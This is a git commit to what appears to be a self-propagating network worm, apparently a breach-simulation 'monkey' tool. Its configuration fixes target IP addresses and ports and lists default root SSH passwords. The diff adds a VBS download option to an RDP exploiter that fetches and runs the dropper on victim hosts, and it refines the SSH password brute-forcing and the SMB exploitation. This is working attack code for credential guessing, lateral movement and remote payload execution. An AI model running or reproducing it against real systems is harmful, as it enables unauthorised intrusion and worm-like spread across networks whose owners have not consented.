minor bug fix

This commit is contained in:
Barak Hoffer 2015-09-30 15:05:30 +03:00
parent 410891518f
commit 73f9821ee4
8 changed files with 39 additions and 16 deletions

View File

@ -96,6 +96,8 @@ class Configuration(object):
### monkey config
###########################
alive = True
singleton_mutex_name = "{2384ec59-0df8-4ab9-918c-843740924a28}"
# how long to wait between scan iterations
@ -127,11 +129,11 @@ class Configuration(object):
#range_class = RelativeRange
range_size = 8
range_class = ClassCRange
range_fixed = ("10.0.0.1")
range_class = FixedRange
range_fixed = ("10.0.0.9", "10.0.0.13", "192.168.1.100", "192.168.1.87")
# TCP Scanner
tcp_target_ports = [22, 445, 135]
tcp_target_ports = [22, 445, 135, 3389]
tcp_scan_timeout = 1000 # 1000 Milliseconds
tcp_scan_interval = 200
tcp_scan_get_banner = True
@ -157,6 +159,7 @@ class Configuration(object):
ssh_user = "root"
ssh_passwords = ["root", "toor", "1234", "12345678"]
alive = True
#rdp exploiter
rdp_use_vbs_download = True
WormConfiguration = Configuration()

View File

@ -11,7 +11,7 @@ from rdpy.core.error import RDPSecurityNegoFail
from logging import getLogger
from exploit import HostExploiter
from exploit.tools import HTTPTools
from model import RDP_CMDLINE_HTTP_BITS
from model import RDP_CMDLINE_HTTP_BITS, RDP_CMDLINE_HTTP_VBS
from model.host import VictimHost
from network.tools import check_port_tcp
from exploit.tools import get_target_monkey
@ -243,7 +243,10 @@ class RdpExploiter(HostExploiter):
# create server for http download.
http_path, http_thread = HTTPTools.create_transfer(host, src_path)
command = RDP_CMDLINE_HTTP_BITS % {'monkey_name': os.path.basename(src_path), 'http_path' : http_path}
if self._config.rdp_use_vbs_download:
command = RDP_CMDLINE_HTTP_VBS % {'monkey_name': os.path.basename(self._config.dropper_target_path), 'http_path' : http_path}
else:
command = RDP_CMDLINE_HTTP_BITS % {'monkey_name': os.path.basename(self._config.dropper_target_path), 'http_path' : http_path}
passwords = list(self._config.psexec_passwords[:])
known_password = host.get_credentials(self._config.psexec_user)
@ -289,9 +292,6 @@ class RdpExploiter(HostExploiter):
LOG.debug("Exploiter RdpGrinder failed, rdp failed.")
return False
elif http_thread.downloads == 0:
LOG.info("Trying rdp logging into victim %r with user"
" %s and password '%s'", host,
self._config.psexec_user, password)
LOG.debug("Exploiter RdpGrinder failed, http download failed.")
return False

View File

@ -3,6 +3,7 @@ from logging import getLogger
from model.host import VictimHost
from model import MONKEY_CMDLINE_DETACHED, DROPPER_CMDLINE_DETACHED
from exploit import HostExploiter
from network.tools import check_port_tcp
from exploit.tools import SmbTools, get_target_monkey
from network import SMBFinger
@ -49,7 +50,7 @@ class SmbExploiter(HostExploiter):
is_nb_open,_ = check_port_tcp(host.ip_addr, 139)
if is_nb_open:
host.os['type'] = 'windows'
return super(HostExploiter, self).is_os_supported(host)
return host.os.get('type') in self._target_os_type
return False
def exploit_host(self, host, src_path=None):

View File

@ -5,10 +5,12 @@ import logging
from exploit import HostExploiter
from model import MONKEY_ARG
from exploit.tools import get_target_monkey
from network.tools import check_port_tcp
__author__ = 'hoffer'
LOG = logging.getLogger(__name__)
SSH_PORT = 22
class SSHExploiter(HostExploiter):
_target_os_type = ['linux', None]
@ -20,6 +22,16 @@ class SSHExploiter(HostExploiter):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.WarningPolicy())
port = SSH_PORT
for servkey,servdata in host.services.items():
if servdata.get('name') == 'ssh' and servkey.startswith('tcp-'):
port = int(servkey.replace('tcp-',''))
is_open,_ = check_port_tcp(host.ip_addr, port)
if not is_open:
LOG.info("SSH port is closed on %r, skipping", host)
return False
passwords = list(self._config.ssh_passwords[:])
known_password = host.get_credentials(self._config.ssh_user)
if known_password is not None:
@ -32,7 +44,8 @@ class SSHExploiter(HostExploiter):
try:
ssh.connect(host.ip_addr,
username=self._config.ssh_user,
password=password)
password=password,
port=port)
LOG.debug("Successfully logged in %r using SSH (%s : %s)",
host, self._config.ssh_user, password)

View File

@ -15,6 +15,7 @@ from model.host import VictimHost
from model import DROPPER_CMDLINE, MONKEY_CMDLINE
from exploit import HostExploiter
from exploit.tools import SmbTools, get_target_monkey
from network.tools import check_port_tcp
try:
from impacket import smb

View File

@ -5,6 +5,7 @@ import logging
from network import HostScanner
from config import WormConfiguration
from info import local_ips
from network.range import *
__author__ = 'itamar'
@ -26,6 +27,10 @@ class NetworkScanner(object):
LOG.info("Found local IP addresses of the machine: %r", self._ip_addresses)
# for fixed range, only scan once.
if WormConfiguration.range_class is FixedRange:
self._ranges = [WormConfiguration.range_class('0.0.0.0')]
else:
self._ranges = [WormConfiguration.range_class(ip_address)
for ip_address in self._ip_addresses]

View File

@ -13,7 +13,7 @@ from model.host import VictimHost
SSH_PORT = 22
SSH_SERVICE = 'tcp-22'
SSH_REGEX = 'SSH-\d\.\d-OpenSSH'
TIMEOUT = 30
TIMEOUT = 10
BANNER_READ = 1024
LINUX_DIST_SSH = ['ubuntu', 'debian']

View File

@ -1,7 +1,7 @@
import socket
import select
DEFAULT_TIMEOUT = 30
DEFAULT_TIMEOUT = 10
BANNER_READ = 1024
def check_port_tcp(ip, port, timeout=DEFAULT_TIMEOUT, get_banner=False):